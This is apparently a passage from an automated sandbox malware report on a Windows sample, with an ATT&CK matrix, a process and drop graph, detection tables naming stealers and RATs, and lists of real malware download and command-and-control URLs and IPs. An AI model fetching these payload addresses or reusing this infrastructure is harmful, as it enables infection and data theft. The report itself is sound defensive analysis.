                                    IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron681
                                    Virtualization/Sandbox Evasion                                    		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                                    Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd21
                                    Access Token Manipulation                                    		Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
                                    Gather Victim Org InformationDNS ServerCompromise Software Supply ChainWindows Command ShellScheduled TaskScheduled Task312
                                    Process Injection                                    		KeyloggingProcess DiscoveryTaint Shared ContentScreen CaptureDNSExfiltration Over Physical MediumResource Hijacking

                                    Behavior Graph

                                    Hide Legend

                                    Legend:

                                    • Process
                                    • Signature
                                    • Created File
                                    • DNS/IP Info
                                    • Is Dropped
                                    • Is Windows Process
                                    • Number of created Registry Values
                                    • Number of created Files
                                    • Visual Basic
                                    • Delphi
                                    • Java
                                    • .Net C# or VB.NET
                                    • C, C++ or other language
                                    • Is malicious
                                    • Internet
                                    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1516777 Sample: file.exe Startdate: 24/09/2024 Architecture: WINDOWS Score: 100 78 www.leopardi.nl 2->78 80 solutionhub.cc 2->80 82 garageserviceoperation.com 2->82 106 Suricata IDS alerts for network traffic 2->106 108 Found malware configuration 2->108 110 Malicious sample detected (through community Yara rule) 2->110 112 22 other signatures 2->112 10 skotes.exe 2 26 2->10         started        15 file.exe 5 2->15         started        17 3ec4738210.exe 2->17         started        19 6 other processes 2->19 signatures3 process4 dnsIp5 92 185.215.113.16, 49723, 49744, 49758 WHOLESALECONNECTIONSNL Portugal 10->92 94 185.215.113.43, 49706, 49707, 49708 WHOLESALECONNECTIONSNL Portugal 10->94 96 185.215.113.103, 49710, 49714, 49715 WHOLESALECONNECTIONSNL Portugal 10->96 64 C:\Users\user\AppData\...\610cd559ac.exe, PE32 10->64 dropped 66 C:\Users\user\AppData\...\6dbb7bdf47.exe, PE32 10->66 dropped 68 C:\Users\user\AppData\...\3ec4738210.exe, PE32 10->68 dropped 74 4 other malicious files 10->74 dropped 144 Creates multiple autostart registry keys 10->144 146 Hides threads from debuggers 10->146 148 Tries to detect sandboxes / dynamic malware analysis system (registry check) 10->148 21 610cd559ac.exe 10->21         started        25 3ec4738210.exe 12 10->25         started        28 b74664dd7e.exe 12 10->28         started        30 6dbb7bdf47.exe 10->30         started        70 C:\Users\user\AppData\Local\...\skotes.exe, PE32 15->70 dropped 72 C:\Users\user\...\skotes.exe:Zone.Identifier, ASCII 15->72 dropped 150 Detected unpacking (changes PE section rights) 15->150 152 Tries to evade debugger and weak emulator (self modifying code) 15->152 154 Tries to detect virtualization through RDTSC time measurements 15->154 32 skotes.exe 15->32         started        156 Tries to detect process monitoring tools (Task Manager, Process Explorer etc.) 17->156 34 WerFault.exe 17->34         started        file6 signatures7 process8 dnsIp9 54 C:\Users\user\AppData\Local\...\axplong.exe, PE32 21->54 dropped 114 Detected unpacking (changes PE section rights) 21->114 116 Tries to evade debugger and weak emulator (self modifying code) 21->116 118 Hides threads from debuggers 21->118 36 axplong.exe 21->36         started        90 185.215.113.37, 49712, 49751, 49793 WHOLESALECONNECTIONSNL Portugal 25->90 120 Antivirus detection for dropped file 25->120 122 Machine Learning detection for dropped file 25->122 124 Tries to detect sandboxes / dynamic malware analysis system (registry check) 25->124 41 WerFault.exe 25->41         started        126 Tries to detect process monitoring tools (Task Manager, Process Explorer etc.) 28->126 43 WerFault.exe 28->43         started        128 Binary is likely a compiled AutoIt script file 30->128 130 Found API chain indicative of debugger detection 30->130 132 Found API chain indicative of sandbox detection 30->132 134 Multi AV Scanner detection for dropped file 32->134 file10 signatures11 process12 dnsIp13 84 103.130.147.211 MYREPUBLIC-AS-IDPTEkaMasRepublikID Turkey 36->84 86 185.215.113.100 WHOLESALECONNECTIONSNL Portugal 36->86 88 5 other IPs or domains 36->88 56 C:\Users\user\AppData\Local\...\Blenar.exe, PE32 36->56 dropped 58 C:\Users\user\AppData\...\newbundle2.exe, PE32 36->58 dropped 60 C:\Users\user\AppData\Local\Temp\...\2.exe, PE32 36->60 dropped 62 23 other malicious files 36->62 dropped 136 Detected unpacking (changes PE section rights) 36->136 138 Tries to detect sandboxes and other dynamic analysis tools (window names) 36->138 140 Creates multiple autostart registry keys 36->140 142 4 other signatures 36->142 45 gold.exe 36->45         started        file14 signatures15 process16 signatures17 158 Antivirus detection for dropped file 45->158 160 Multi AV Scanner detection for dropped file 45->160 162 Writes to foreign memory regions 45->162 164 2 other signatures 45->164 48 RegAsm.exe 45->48         started        52 conhost.exe 45->52         started        process18 dnsIp19 76 95.179.250.45, 26212, 49760, 49763 AS-CHOOPAUS Netherlands 48->76 98 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 48->98 100 Installs new ROOT certificates 48->100 102 Found many strings related to Crypto-Wallets (likely being stolen) 48->102 104 3 other signatures 48->104 signatures20

                                    Screenshots

                                    Thumbnails

                                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                                    windows-stand

                                    Antivirus, Machine Learning and Genetic Malware Detection

                                    Initial Sample

                                    SourceDetectionScannerLabelLink
                                    file.exe47%ReversingLabsWin32.Packed.Generic
                                    file.exe100%AviraTR/Crypt.TPM.Gen
                                    file.exe100%Joe Sandbox ML

                                    Dropped Files

                                    SourceDetectionScannerLabelLink
                                    C:\Users\user\1000015002\b74664dd7e.exe100%AviraTR/Crypt.TPM.Gen
                                    C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe100%AviraTR/Crypt.TPM.Gen
                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\random[2].exe100%AviraTR/Crypt.TPM.Gen
                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\2[1].exe100%AviraTR/Drop.Agent.fgswh
                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\gold[1].exe100%AviraHEUR/AGEN.1351932
                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\crypted[1].exe100%AviraHEUR/AGEN.1357677
                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\random[1].exe100%AviraTR/Crypt.TPM.Gen
                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\random[1].exe100%AviraTR/Crypt.TPM.Gen
                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\LummaC222222[1].exe100%AviraHEUR/AGEN.1316118
                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\penis[1].exe100%AviraTR/Spy.RedLine.ouvlp
                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\stealc_default2[1].exe100%AviraTR/AD.Stealc.pegov
                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\acentric[1].exe100%AviraTR/Spy.Agent.bvpeh
                                    C:\Users\user\AppData\Local\Temp\1000002001\gold.exe100%AviraHEUR/AGEN.1351932
                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\Blenar[1].exe100%AviraHEUR/AGEN.1312961
                                    C:\Users\user\1000015002\b74664dd7e.exe100%Joe Sandbox ML
                                    C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe100%Joe Sandbox ML
                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\random[2].exe100%Joe Sandbox ML
                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\2[1].exe100%Joe Sandbox ML
                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\66ed86be077bb_12[1].exe100%Joe Sandbox ML
                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\needmoney[1].exe100%Joe Sandbox ML
                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\random[1].exe100%Joe Sandbox ML
                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\random[1].exe100%Joe Sandbox ML
                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\splwow64[1].exe100%Joe Sandbox ML
                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\penis[1].exe100%Joe Sandbox ML
                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\stealc_default2[1].exe100%Joe Sandbox ML
                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\random[1].exe100%Joe Sandbox ML
                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\acentric[1].exe88%ReversingLabsWin32.Trojan.Acll
                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\crypted[1].exe66%ReversingLabsWin32.Trojan.Jalapeno
                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\gold[1].exe100%ReversingLabsByteCode-MSIL.Trojan.Seraph
                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\newbundle2[1].exe88%ReversingLabsByteCode-MSIL.Trojan.Jalapeno
                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\2[1].exe69%ReversingLabsByteCode-MSIL.Spyware.AsyncRAT
                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\Blenar[1].exe5%ReversingLabs
                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\stealc_default2[1].exe76%ReversingLabsWin32.Trojan.Stealerc
                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\2[1].exe61%ReversingLabsWin32.Trojan.CryptBot
                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\66ed86be077bb_12[1].exe71%ReversingLabsWin32.Trojan.Amadey
                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\needmoney[1].exe92%ReversingLabsWin32.Trojan.Stealc
                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\LummaC222222[1].exe58%ReversingLabsWin32.Spyware.Lummastealer
                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\penis[1].exe83%ReversingLabsWin32.Trojan.Whispergate
                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\splwow64[1].exe61%ReversingLabsWin32.Trojan.Znyonm
                                    C:\Users\user\AppData\Local\Temp\1000002001\gold.exe100%ReversingLabsByteCode-MSIL.Trojan.Seraph
                                    C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe76%ReversingLabsWin32.Trojan.Stealerc
                                    C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe88%ReversingLabsWin32.Trojan.Acll
                                    C:\Users\user\AppData\Local\Temp\1000285001\2.exe69%ReversingLabsByteCode-MSIL.Spyware.AsyncRAT
                                    C:\Users\user\AppData\Local\Temp\1000287001\splwow64.exe61%ReversingLabsWin32.Trojan.Znyonm
                                    C:\Users\user\AppData\Local\Temp\1000290001\crypted.exe66%ReversingLabsWin32.Trojan.Jalapeno
                                    C:\Users\user\AppData\Local\Temp\1000314001\LummaC222222.exe58%ReversingLabsWin32.Spyware.Lummastealer
                                    C:\Users\user\AppData\Local\Temp\1000318001\66ed86be077bb_12.exe71%ReversingLabsWin32.Trojan.Amadey
                                    C:\Users\user\AppData\Local\Temp\1000321001\2.exe61%ReversingLabsWin32.Trojan.CryptBot
                                    C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe88%ReversingLabsByteCode-MSIL.Trojan.Jalapeno
                                    C:\Users\user\AppData\Local\Temp\1000340001\Blenar.exe5%ReversingLabs
                                    C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe47%ReversingLabsWin32.Trojan.Generic

                                    Unpacked PE Files

                                    No Antivirus matches

                                    Domains

                                    No Antivirus matches

                                    URLs

                                    SourceDetectionScannerLabelLink
                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                                    http://crt.sectigo.com/SectigoPublicTimeStampingRootR46.p7c0#0%URL Reputationsafe
                                    https://api.ip.sb/ip0%URL Reputationsafe
                                    http://crl.sectigo.com/SectigoPublicTimeStampingCAR36.crl0z0%URL Reputationsafe
                                    http://ocsp.sectigo.com00%URL Reputationsafe
                                    http://185.215.113.117/inc/needmoney.exeYk0%Avira URL Cloudsafe
                                    http://tempuri.org/0%Avira URL Cloudsafe
                                    http://tempuri.org/Entity/Id12Response0%Avira URL Cloudsafe
                                    http://schemas.xmlsoap.org/ws/2004/04/security/sc/dk0%Avira URL Cloudsafe
                                    http://schemas.xmlsoap.org/ws/2005/02/sc/sct0%Avira URL Cloudsafe
                                    http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Text0%Avira URL Cloudsafe
                                    http://185.215.113.37/X100%Avira URL Cloudmalware
                                    http://185.215.113.37/O100%Avira URL Cloudmalware
                                    http://tempuri.org/Entity/Id23ResponseD0%Avira URL Cloudsafe
                                    http://147.45.44.104/malesa/66ed86be077bb_12.exe01100%Avira URL Cloudmalware
                                    http://tempuri.org/Entity/Id6ResponseD0%Avira URL Cloudsafe
                                    http://tempuri.org/Entity/Id2Response0%Avira URL Cloudsafe
                                    http://tempuri.org/Entity/Id21Response0%Avira URL Cloudsafe
                                    http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLID0%Avira URL Cloudsafe
                                    http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha10%Avira URL Cloudsafe
                                    http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecret0%Avira URL Cloudsafe
                                    http://185.215.113.37/H100%Avira URL Cloudmalware
                                    https://www.leopardi.nl/frm/_vti_cnf/Blenar.exey0%Avira URL Cloudsafe
                                    http://185.215.113.37/e2b1563c6670f193.phpk100%Avira URL Cloudmalware
                                    http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_Wrap0%Avira URL Cloudsafe
                                    http://tempuri.org/Entity/Id13ResponseD0%Avira URL Cloudsafe
                                    http://tempuri.org/Entity/Id15Response0%Avira URL Cloudsafe
                                    http://schemas.xmlsoap.org/ws/2004/10/wsat/Aborted0%Avira URL Cloudsafe
                                    http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequence0%Avira URL Cloudsafe
                                    http://schemas.xmlsoap.org/ws/2004/10/wsat/fault0%Avira URL Cloudsafe
                                    http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue0%Avira URL Cloudsafe
                                    http://103.130.147.211/Files/2.exe100%Avira URL Cloudmalware
                                    http://schemas.xmlsoap.org/ws/2004/10/wsat0%Avira URL Cloudsafe
                                    http://185.215.113.117/inc/gold.exe100%Avira URL Cloudmalware
                                    http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Renew0%Avira URL Cloudsafe
                                    http://schemas.xmlsoap.org/ws/2004/08/addressing/faultp90%Avira URL Cloudsafe
                                    https://www.leopardi.nl/frm/_vti_cnf/Blenar.exe0%Avira URL Cloudsafe
                                    http://185.215.113.37/ata100%Avira URL Cloudmalware
                                    http://schemas.xmlsoap.org/ws/2004/10/wscoor/Register0%Avira URL Cloudsafe
                                    http://tempuri.org/Entity/Id1ResponseD0%Avira URL Cloudsafe
                                    http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKey0%Avira URL Cloudsafe
                                    http://185.215.113.43/Zu7JuNko/index.php0200010%Avira URL Cloudsafe
                                    http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Cancel0%Avira URL Cloudsafe
                                    http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA10%Avira URL Cloudsafe
                                    http://185.215.113.100/steam/random.exe100%Avira URL Cloudmalware
                                    http://tempuri.org/Entity/Id24Response0%Avira URL Cloudsafe
                                    http://tempuri.org/Entity/Id21ResponseD0%Avira URL Cloudsafe
                                    https://www.leopardi.nl/frm/_vti_cnf/Blenar.exeC0%Avira URL Cloudsafe
                                    http://185.215.113.16/dobre/splwow64.exe100%Avira URL Cloudphishing
                                    http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue0%Avira URL Cloudsafe
                                    http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnego0%Avira URL Cloudsafe
                                    http://tempuri.org/Entity/Id10ResponseD0%Avira URL Cloudsafe
                                    http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequested0%Avira URL Cloudsafe
                                    http://194.116.215.195/12dsvc.exe100%Avira URL Cloudmalware
                                    http://schemas.xmlsoap.org/ws/2004/08/addressing0%Avira URL Cloudsafe
                                    http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponse0%Avira URL Cloudsafe
                                    http://tempuri.org/Entity/Id5Response0%Avira URL Cloudsafe
                                    http://tempuri.org/Entity/Id10Response0%Avira URL Cloudsafe
                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dns0%Avira URL Cloudsafe
                                    http://tempuri.org/Entity/Id15ResponseD0%Avira URL Cloudsafe
                                    http://schemas.xmlsoap.org/ws/2005/02/trust/Renew0%Avira URL Cloudsafe
                                    http://185.215.113.16/inc/2.exe100%Avira URL Cloudphishing
                                    http://185.215.113.37/100%Avira URL Cloudmalware
                                    http://185.215.113.43/15.113.43/fae1daa8e9eb4e4f9b5846d934f48b15eaa495c49##R0%Avira URL Cloudsafe
                                    http://tempuri.org/Entity/Id8Response0%Avira URL Cloudsafe
                                    http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionID0%Avira URL Cloudsafe
                                    http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/SCT0%Avira URL Cloudsafe
                                    http://schemas.xmlsoap.org/ws/2006/02/addressingidentity0%Avira URL Cloudsafe
                                    http://schemas.xmlsoap.org/ws/2004/10/wsat/Rollback0%Avira URL Cloudsafe
                                    http://schemas.xmlsoap.org/ws/2005/02/trust/PublicKey0%Avira URL Cloudsafe
                                    http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/SCT0%Avira URL Cloudsafe
                                    http://185.215.113.43/Zu7JuNko/index.phpO0%Avira URL Cloudsafe
                                    http://185.215.113.43/Zu7JuNko/index.phpR0%Avira URL Cloudsafe
                                    http://185.215.113.26/Nework.exe100%Avira URL Cloudmalware
                                    http://tempuri.org/D0%Avira URL Cloudsafe
                                    http://schemas.xmlsoap.org/ws/2004/06/addressingex0%Avira URL Cloudsafe
                                    http://185.215.113.16/Jo89Ku7d/index.php1K100%Avira URL Cloudphishing
                                    http://103.130.147.211/Files/2.exeR0%Avira URL Cloudsafe
                                    http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequenceResponse0%Avira URL Cloudsafe
                                    http://185.215.113.37I0%Avira URL Cloudsafe
                                    http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ15100%Avira URL Cloudsafe
                                    http://schemas.xmlsoap.org/ws/2004/04/security/trust/Nonce0%Avira URL Cloudsafe
                                    http://185.215.113.37/tSwf100%Avira URL Cloudmalware
                                    http://185.215.113.37/e2b1563c6670f193.phpWindows100%Avira URL Cloudmalware
                                    http://tempuri.org/Entity/Id13Response0%Avira URL Cloudsafe
                                    http://schemas.xmlsoap.org/ws/2004/10/wsat/Committed0%Avira URL Cloudsafe
                                    http://tempuri.org/Entity/Id12ResponseD0%Avira URL Cloudsafe
                                    http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd0%Avira URL Cloudsafe
                                    http://schemas.xmlsoap.org/ws/2005/02/trust/CK/PSHA10%Avira URL Cloudsafe
                                    http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#ThumbprintSHA10%Avira URL Cloudsafe
                                    http://schemas.xmlsoap.org/ws/2005/05/identity/right/possessproperty0%Avira URL Cloudsafe
                                    http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509SubjectKeyIdentif0%Avira URL Cloudsafe
                                    http://185.215.113.37m0%Avira URL Cloudsafe
                                    http://schemas.xmlsoap.org/ws/2004/04/security/sc/sct0%Avira URL Cloudsafe
                                    http://185.215.113.16/inc/penis.exe100%Avira URL Cloudphishing
                                    http://tempuri.org/Entity/Id7ResponseD0%Avira URL Cloudsafe
                                    http://schemas.xmlsoap.org/ws/2005/02/rm/SequenceAcknowledgement0%Avira URL Cloudsafe
                                    http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT0%Avira URL Cloudsafe
                                    http://185.215.113.43/Zu7JuNko/index.phpoft0%Avira URL Cloudsafe
                                    http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous0%Avira URL Cloudsafe

                                    Domains and IPs

                                    Contacted Domains

                                    NameIPActiveMaliciousAntivirus DetectionReputation
                                    www.leopardi.nl
                                    		46.19.218.204
                                    		truefalse
                                      		unknown

                                      Contacted URLs

                                      NameMaliciousAntivirus DetectionReputation
                                      https://www.leopardi.nl/frm/_vti_cnf/Blenar.exefalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://185.215.113.37/true
                                      • Avira URL Cloud: malware
                                      		unknown

                                      URLs from Memory and Binaries

                                      NameSourceMaliciousAntivirus DetectionReputation
                                      http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#TextRegAsm.exe, 00000021.00000002.2744975325.0000000003274000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://schemas.xmlsoap.org/ws/2005/02/sc/sctRegAsm.exe, 00000021.00000002.2744975325.0000000003274000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://schemas.xmlsoap.org/ws/2004/04/security/sc/dkRegAsm.exe, 00000021.00000002.2744975325.0000000003274000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://147.45.44.104/malesa/66ed86be077bb_12.exe01axplong.exe, 0000001B.00000002.3769503003.0000000001494000.00000004.00000020.00020000.00000000.sdmptrue
                                      • Avira URL Cloud: malware
                                      		unknown
                                      http://185.215.113.37/Xb74664dd7e.exe, 00000013.00000002.2673207759.0000000000FAB000.00000004.00000020.00020000.00000000.sdmptrue
                                      • Avira URL Cloud: malware
                                      		unknown
                                      http://tempuri.org/Entity/Id23ResponseDRegAsm.exe, 00000021.00000002.2744975325.0000000003499000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://185.215.113.117/inc/needmoney.exeYkaxplong.exe, 0000001B.00000002.3769503003.0000000001494000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://tempuri.org/Entity/Id12ResponseRegAsm.exe, 00000021.00000002.2744975325.00000000031AE000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.00000000031DF000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.00000000030B6000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.00000000030EB000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.000000000311C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.000000000317D000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.0000000003011000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.0000000003274000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.000000000314C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.0000000003241000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.0000000003210000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://185.215.113.37/O3ec4738210.exe, 0000001A.00000002.2284052492.0000000000F1B000.00000004.00000020.00020000.00000000.sdmptrue
                                      • Avira URL Cloud: malware
                                      		unknown
                                      http://tempuri.org/RegAsm.exe, 00000021.00000002.2744975325.0000000003011000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://tempuri.org/Entity/Id2ResponseRegAsm.exe, 00000021.00000002.2744975325.00000000031AE000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.00000000031DF000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.00000000030B6000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.00000000030EB000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.000000000311C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.000000000317D000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.0000000003011000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.000000000314C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.0000000003241000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.0000000003210000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1RegAsm.exe, 00000021.00000002.2744975325.0000000003274000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://tempuri.org/Entity/Id21ResponseRegAsm.exe, 00000021.00000002.2744975325.00000000031AE000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.00000000031DF000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.00000000030B6000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.00000000030EB000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.000000000311C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.000000000317D000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.0000000003011000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.000000000314C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.0000000003241000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.0000000003210000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_WrapRegAsm.exe, 00000021.00000002.2744975325.0000000003274000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://185.215.113.37/H3ec4738210.exe, 0000000D.00000002.1976198696.0000000000FA3000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: malware
                                      		unknown
                                      http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLIDRegAsm.exe, 00000021.00000002.2744975325.0000000003274000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://tempuri.org/Entity/Id6ResponseDRegAsm.exe, 00000021.00000002.2744975325.0000000003274000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecretRegAsm.exe, 00000021.00000002.2744975325.0000000003274000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://www.leopardi.nl/frm/_vti_cnf/Blenar.exeyaxplong.exe, 0000001B.00000002.3769503003.0000000001494000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://185.215.113.37/e2b1563c6670f193.phpkb74664dd7e.exe, 0000001D.00000002.2792862379.000000000127E000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: malware
                                      		unknown
                                      http://103.130.147.211/Files/2.exeaxplong.exe, 0000001B.00000002.3769503003.0000000001494000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: malware
                                      		unknown
                                      http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/IssueRegAsm.exe, 00000021.00000002.2744975325.0000000003274000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://schemas.xmlsoap.org/ws/2004/10/wsat/AbortedRegAsm.exe, 00000021.00000002.2744975325.0000000003274000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
